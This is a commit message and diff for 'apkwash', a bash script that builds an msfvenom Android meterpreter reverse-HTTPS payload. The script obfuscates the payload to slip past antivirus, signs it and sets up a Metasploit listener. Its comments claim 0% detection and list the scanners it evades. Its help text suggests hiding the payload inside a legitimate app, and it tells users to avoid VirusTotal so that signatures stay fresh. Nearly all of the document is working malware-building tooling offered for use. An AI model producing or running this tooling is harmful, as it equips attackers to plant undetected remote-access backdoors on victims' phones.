Changed functionality
Instead of generating the payload with MSFVenom, then moving over to the script to wash it the script handles everything needed. 

Coming soon: 
-Avast signature bypass
-APKInjector / MSFVenom -x implementation within apkwash

diff --git a/apkwash b/apkwash
--- a/apkwash
+++ b/apkwash
@@ -2,30 +2,145 @@
 
 # Author: Justin Breed
 # Purpose: Change msfvenom payload to bypass AV detection for a metasploit payload
-# Date: 0% detection as of 16Feb17
+# Tested Date: 20Mar17
+# NoDistribute: 0% Detection
+# Flagged by: Avast (PUP - May need to adjust permissions. Will review on next update)
+# Verified manually and successfully bypassed: Kaspersky, AVG, Lookout
 
-if [ $# -eq 0 ] || [ ${1: -4} != ".apk" ]; then
-    echo
-    echo "-------------INVALID ARGUMENT------------"
-    echo "Please pass in a msfvenom generated .apk file"
-    echo "msfvenom -p android/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT> -o payload.apk"
-    echo "Ex: apkwash payload.apk"
-    echo "-----------------------------------------"
-    exit 1
+# Input argument variables // setting default values
+PAYLOAD="android/meterpreter/reverse_https"
+LHOST=`ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}'`
+LPORT="4444"
+VERBOSE=0
+inFile=""   #will be used for msfvenom -x injection in next update
+outFile="payload.apk"
+
+# Setting up the input arguments and help information
+while [ -n "$1" ]; do
+	OPT="$1"
+	if [ x"$OPT" = x"--" ]; then
+		shift
+		for OPT ; do
+			REMAINS="$REMAINS \"$OPT\""
+		done
+		break
+	fi
+	while [ x"$OPT" != x"-" ] ; do
+		case "$OPT" in
+			-h* | --help )
+				echo -e "
+APKWash is a simply bash script that leverages MSFVenom to generate a payload, APKTool to decompile and rebuild the packages, and simple SED statements for modifying strings that are being flagged by AV's. 
+
+Output: <payload>.apk & <payload>.listener
+
+-p | --payload : (Default: android/meterpreter/reverse_https) This sets the payload to be generated by msfvenom.
+-o | --output : (Default: payload.apk) This sets the name of the APK created as well as the output filename.
+-x | --original : (MSFVenom -x) Input APK to inject the payload into.
+-x | --newkey : For auto-removing debug key to allow the creation of a new key within the script
+-v | --verbose : Don't mask output of commands
+-h | --help : Help information
+
+Example: apkwash -p android/meterpreter/reverse_http LHOST=10.1.1.20 LPORT=1337 -o AndroidService.apk
+Example2: apkwash -x CCleaner.apk -o ImAnIdiotForTrustingThisApp.apk
+				"
+				exit 1
+				;;
+			-p* | --payload )
+				PAYLOAD="$2"
+				shift
+				;;
+			-o* | --output )
+				outFile="$2"
+				shift
+				;;
+			-x* | --original )
+				inFile="$2"
+				shift
+				;;
+			-v* | --verbose )
+				VERBOSE=1
+				shift
+				;;
+			-n* | --newkey )
+				rm -rf ~/.android/debug.keystore &> /dev/null
+				shift
+				;;
+			* )
+				REMAINS="$REMAINS \"$OPT\""
+				break
+				;;
+		esac
+		NEXTOPT="${OPT#-[cfr]}"
+		if [ x"$OPT" != x"$NEXTOPT" ] ; then
+			OPT="-$NEXTOPT"
+		else
+			break
+		fi
+	done
+	shift
+done
+eval set -- $REMAINS
+
+# Grab extra params used for the payload
+for i in $REMAINS;
+do
+	param=${i//\"}
+	SAVEIFS=$IFS
+	IFS=$'='
+	params=($param)
+	IFS=$SAVEIFS
+	if [ ${params[0]} == "LPORT" ]; then
+		LPORT=${params[1]}
+	elif [ ${params[0]} == "LHOST" ]; then
+		LHOST=${params[1]}
+	fi
+done
+
+# Method simply used for masking output for non-verbose mode
+redirect() {
+	if [ $VERBOSE -eq 0 ]; then
+        	"$@" &> /dev/null
+    	else
+          	"$@"
+       	fi
+}
+
+# To prevent falsely stating the payload was generated successfully
+redirect rm -rf $outFile
+
+# Generating the MSFVenom payload
+echo -e "\033[34m [-] \x1B[0m Generating MSFVenom payload"
+if [ -z $inFile ]; then
+	echo -e "\033[34m [-] \x1B[0m msfvenom -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $outFile"
+	redirect msfvenom -p $PAYLOAD LHOST\=$LHOST LPORT\=$LPORT -o $outFile
+else 
+	#echo -e "\033[34m [-] \x1B[0m msfvenom -x $inFile -p $PAYLOAD LHOST=$LHOST LPORT=$LPORT -o $outFile"
+	#redirect msfvenom -p $PAYLOAD LHOST\=$LHOST $LPORT\=LPORT -x $inFile -o $outFile
+	echo -e "\033[31m [-] \x1B[0m Sorry, but the injection method hasn't been implemented yet. Coming soon!"
+	exit 1
+fi
+
+# Exit if there was no file generated.
+if [ ! -f $outFile ]; then
+	echo -e "\033[31m [-] \x1B[0m MSFVenom payload generation failed."
+	exit 1
+else
+	echo -e "\033[32m [-] \x1B[0m MSFVenom payload successfully generated."
+	echo -e "\033[34m [-] \x1B[0m Giving it a bath..."
 fi
 
 #Checking dependencies
 type apktool.jar >/dev/null 2>&1 || { 
-    echo "ApkTool depenency needed... downloading"
-    wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.2.2.jar
+    echo -e "\033[33m [-] \x1B[0m ApkTool depenency needed... downloading and moving to /usr/local/bin"
+    redirect wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.2.2.jar
     mv apktool_2.2.2.jar apktool.jar
     chmod +x apktool.jar
     mv apktool.jar /usr/local/bin/.
 }
 
 
-# Variables
-fullPath=$1
+# Variables used for the washing process
+fullPath=$outFile
 APK=$(basename $fullPath)
 VAR1=`cat /dev/urandom | tr -cd 'a-z' | head -c 10` # smali dir renaming
 VAR2=`cat /dev/urandom | tr -cd 'a-z' | head -c 10` # smali dir renaming
@@ -35,12 +150,11 @@ VAR5=`cat /dev/urandom | tr -cd 'a-z' | head -c 10` # Pakage name renaming 2
 VAR6=`cat /dev/urandom | tr -cd 'a-z' | head -c 10` # Pakage name renaming 3
 VAR7=`cat /dev/urandom | tr -cd 'a-z' | head -c 10` # New name for word 'payload'
 VAR8=`cat /dev/urandom | tr -cd 'a-z' | head -c 10` # New name for word 'metasploit'
-
 JAR=`which apktool.jar`
 apkName=$(echo $APK | cut -f 1 -d '.')
 
 #APKTool to pull apart the package
-java -jar $JAR d -f -o /tmp/payload $fullPath
+redirect java -jar $JAR d -f -o /tmp/payload $fullPath
 
 #Changing the default folder and filenames being flagged by AV
 mv /tmp/payload/smali/com/metasploit /tmp/payload/smali/com/$VAR1
@@ -49,9 +163,7 @@ mv /tmp/payload/smali/com/$VAR1/$VAR2/Payload.smali /tmp/payload/smali/com/$VAR1
 
 #Exit the script if an older payload was generated
 if [ -f /tmp/payload/smali/com/$VAR1/$VAR2/PayloadTrustManager.smali ]; then
-    echo
-    echo -e "\033[31m An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! \n\n Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue. \x1B[0m"
-    echo
+    echo -e "\033[31m [-] \x1B[0m An old version of the msfvenom generated payload was detected. Make sure you have everything compeltely updated in Kali! \n\n Older payloads have not been configured in this script to bypass AV. With that, this script still results in a 1/35 on nodistribute.com for the old payloads, but it is not recommended to continue. Ex: # apt-get update && apt-get dist-upgrade"
     exit 1
 fi
 
@@ -71,36 +183,41 @@ sed -i '/.SET_WALLPAPER/d' /tmp/payload/AndroidManifest.xml
 sed -i '/READ_SMS/a<uses-permission android:name="android.permission.SET_WALLPAPER"/>' /tmp/payload/AndroidManifest.xml
 
 #Rebuild the package using APKTool
-java -jar $JAR b /tmp/payload
-echo; 
-echo -e "\033[34m Washed package created: `pwd`/washed_$APK \x1B[0m"
-echo -e "\033[34m Moving the injected package to the current directory \x1B[0m"
-mv /tmp/payload/dist/$APK washed_$APK
-echo
+redirect java -jar $JAR b /tmp/payload
+echo -e "\033[34m [-] \x1B[0m Washed package created: $outFile"
+echo -e "\033[34m [-] \x1B[0m Moving the injected package to the current directory"
+mv /tmp/payload/dist/$APK $outFile
 
 #Signing the package
-echo -e "\033[34m Checking for ~/.android/debug.keystore for signing \x1B[0m"
+echo -e "\033[34m [-] \x1B[0m Checking for ~/.android/debug.keystore for signing"
 if [ ! -f ~/.android/debug.keystore ]; then
-    echo
-    echo "Debug key not found. Generating one now."
-    echo
+    echo -e "\033[33m [-] \x1B[0m Debug key not found. Generating one now."
     if [ ! -d "~/.android" ]; then
-      mkdir ~/.android
+      redirect mkdir ~/.android
     fi
-    keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
+    keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000 
 fi
-echo
-echo -e "\033[34m Attempting to sign the package with your android debug key \x1B[0m"
-echo
-jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA washed_$APK androiddebugkey
-echo
-echo -e "\033[34m Signed the .apk file with ~/.android/debug.keystore \x1B[0m"
-echo -e "\033[34m Simply remove the debug.keystore file and re-run the program to be prompted to create a new debug key \x1B[0m"
-echo
-echo -e "\033[34m Cleaning up \x1B[0m"
-rm -rf /tmp/payload
-echo
-echo -e "\033[32m Finished! \x1B[0m"
-echo
-echo -e "\033[36m Please do not upload the washed/injected files to VirusTotal.com. \x1B[0m"
-echo -e "\033[36m Use nodistribute.com, or manual scanning on a device. \x1B[0m"
+echo -e "\033[34m [-] \x1B[0m Attempting to sign the package with your android debug key"
+jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $outFile androiddebugkey
+echo -e "\033[32m [-] \x1B[0m Signed the .apk file with ~/.android/debug.keystore"
+echo -e "\033[34m [-] \x1B[0m To generate a new key per package use the '-n' option"
+echo -e "\033[34m [-] \x1B[0m Cleaning up "
+#rm -rf /tmp/payload
+echo -e "\033[32m [-] \x1B[0m Finished generating the payload."
+echo -e "\033[33m [-] \x1B[0m Please do not upload the washed/injected files to VirusTotal.com"
+echo -e "\033[36m [-] \x1B[0m Use nodistribute.com, or manual scanning on a device."
+echo -e "\033[34m [-] \x1B[0m Generating msf listener file: $outFile.listener"
+echo "use multi/handler" > /tmp/$apkName.listener
+echo "set payload $PAYLOAD" >> /tmp/$apkName.listener
+echo "set LHOST $LHOST" >> /tmp/$apkName.listener
+echo "set LPORT $LPORT" >> /tmp/$apkName.listener
+echo "set ExitOnSession false" >> /tmp/$apkName.listener
+echo "exploit -j" >> /tmp/$apkName.listener
+echo -e "\033[32m [-] \x1B[0m Listener script has been generated: /tmp/$apkName.listener"
+echo -e "\033[34m [-] \x1B[0m Start listener with: msfconsole -r /tmp/$apkName.listener"
+read -r -p " [-]  Launch listener now? [y/N] " response
+case "$response" in
+    [yY][eE][sS]|[yY]) 
+        msfconsole -r /tmp/$apkName.listener 
+        ;;
+esac
